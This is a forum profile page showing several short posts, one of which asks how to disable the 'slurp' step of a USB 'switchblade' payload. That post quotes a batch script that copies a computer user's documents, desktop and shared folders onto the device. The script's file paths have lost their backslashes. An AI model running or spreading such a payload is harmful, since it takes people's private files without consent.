Jump to content

Nameless

Members
  • Posts

    4
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Nameless's Achievements

Newbie

Newbie (1/14)

  1. Nameless

    need help

    go to portableapps.com they a a portable command prompt
  2. thanks man, that explain a lot. I'm trying to learn as much about this stuff as i can.
  3. yeah, I want to stop them from running
  4. How would I go about disabling the slurp commands in my switchblade. This the code for fc_slurp2. bat :: These first two commands copy the entire contents of the current users My Documents and Desktop folders :: My Documents files mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o :: Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataDesktop fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o :: These last two commands copy the entire contents of the Shared Documents and All Users Desktop folders :: All Users Desktop files mkdir ....Documentslogfiles%computername%Slurp_DataSharedDesktop fc.exe "C:Documents and SettingsAll UsersDesktop*" "....Documentslogfiles%computername%Slurp_DataSharedDesktop*" /i /o :: All Users Documents files mkdir ....Documentslogfiles%computername%Slurp_DataSharedDocuments fc.exe "C:Documents and SettingsAll UsersShared Documents*" "....Documentslogfiles%computername%Slurp_DataSharedDocuments*" /i /o I am using the pocketknife payload. Thanks for the help.
×
×
  • Create New...